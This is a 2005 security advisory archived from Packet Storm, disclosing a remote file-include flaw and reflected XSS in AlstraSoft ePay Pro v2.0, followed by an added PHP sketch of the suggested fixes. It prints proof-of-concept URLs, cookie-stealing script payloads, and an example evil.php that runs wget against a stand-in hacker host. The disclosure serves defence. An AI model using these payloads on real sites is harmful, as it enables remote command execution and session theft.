AlstraSoft20.txt

17 Apr 2005 00:00:00 | Reported by Diabolic Crab | Type: packetstorm | Source: packetstormsecurity.com

AlstraSoft ePay Pro v2.0 has file include and multiple XSS vulnerabilities. Severity is high. Vendor is AlstraSoft. Proof of concept exploits are demonstrated. Possible fixes include using htmlspecialchars() and a base directory for file inclusion.

`-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA1  
  
Dcrab's Security Advisory  
[Hsc Security Group] http://www.hackerscenter.com/  
[dP Security] http://digitalparadox.org/  
  
Severity: High  
Title: AlstraSoft EPay Pro v2.0 has file include and multiple xss vulnerabilities  
Date: 02/04/2005  
  
Vendor: AlstraSoft  
Vendor Website: http://www.alstrasoft.com  
Summary: Alstrasoft epay pro v2. has file include and multiple xss vulnerabilities.  
  
Proof of Concept Exploits:  
  
http://localhost/epal/index.php?view=http://www.whatismyip.com?  
File include vulnerability  
  
Instead of www.whatismyip.com, suppose we replaced that with evil.php on www.server.com, which contained evil code such as  
<?  
system('wget http://www.hacker.com');  
?>  
and we ran http://localhost/epal/index.php?view=http://www.server.com/evil, it would execute the command, and thus this can lead to arbitrary command execution.  
  
  
http://localhost/epal/?order_num=crap&payment="><script>alert(document.cookie)</script>&send=first&send=regular&send=priority&send=express  
Pops cookie  
  
  
http://localhost/epal/?order_num=crap&payment=crap&send=first&send=regular&send=priority&send='%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E  
Pops cookie  
  
  
Possible Fixes: The usage of htmlspecialchars(), and using a base directory for file include would solve these problems.  
  
Keep yourself updated, Rss feed at: http://digitalparadox.org/rss.ah  
  
Author:  
These vulnerabilities have been found and released by Diabolic Crab, Email: dcrab[AT|NOSPAM]hackerscenter[DOT|NOSPAM]com, please feel free to contact me regarding these vulnerabilities. You can find me at http://www.hackerscenter.com or http://digitalparadox.org/. Look out for my soon to come out book on Secure coding with php.  
  
Diabolic Crab's Security Services: Contact at dcrab[NOSPAM|AT]hackerscenter[NOSPAM|DOT]COM for Php auditing and web application securing services, along with programming in php, vb, asp, c, c++, perl, java, html and graphic designing.  
  
-----BEGIN PGP SIGNATURE-----  
Version: PGP 8.1 - not licensed for commercial use: www.pgp.com  
  
iQA/AwUBQk2p4SZV5e8av/DUEQIWsQCfW213hHs/Bd4QZBoLFufN1NM+AkUAn3Xd  
vW9dOgM7AoFDa/JaMgMjaisw  
=sb0J  
-----END PGP SIGNATURE-----  
  
  
`
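
The two fixes the advisory names, sketched in PHP as an added example (not AlstraSoft's code and not part of the original advisory). The `views` directory and the functions `resolve_view()` and `e()` are hypothetical names, and the sample values are constructed from the proof-of-concept URLs above.

```php
<?php
declare(strict_types=1);

// Hypothetical layout: page templates live in ./views next to this script.
const VIEW_DIR = __DIR__ . '/views';

/** Map the "view" parameter to a file under $baseDir, or null if unacceptable. */
function resolve_view($view, string $baseDir = VIEW_DIR): ?string
{
    // Only a short plain name is accepted: no scheme, slash, dot or NUL,
    // so "http://..." and "../" values never reach the filesystem.
    if (!is_string($view) || !preg_match('/\A[a-z0-9_-]{1,64}\z/i', $view)) {
        return null;
    }
    $base = realpath($baseDir);
    $path = realpath($baseDir . '/' . $view . '.php');
    // realpath() resolves symlinks; the result must still sit inside the base.
    if ($base === false || $path === false
        || strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $path;
}

/** Encode a request value for HTML text or a quoted attribute value. */
function e($value): string
{
    // ENT_QUOTES matters: before PHP 8.1 the default flags leave ' unencoded,
    // which is the character the second send= proof of concept opens with.
    $s = is_string($value) ? $value : '';   // send[]=... would arrive as an array
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Constructed request values shaped like the advisory's proof-of-concept URLs.
$samples = [
    'view'    => 'http://www.server.com/evil',
    'payment' => '"><script>alert(document.cookie)</script>',
    'send'    => "'><script>alert(document.cookie)</script>",
];

$path = resolve_view($samples['view']);
echo $path === null ? "view rejected\n" : "would include $path\n";
printf("<input name=\"payment\" value=\"%s\">\n", e($samples['payment']));
printf("<input name='send' value='%s'>\n", e($samples['send']));
```

Keeping `allow_url_include` off (the default since PHP 5.2) blocks the remote form of the include as a second layer, but it does not stop local path traversal, which the base-directory check does.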
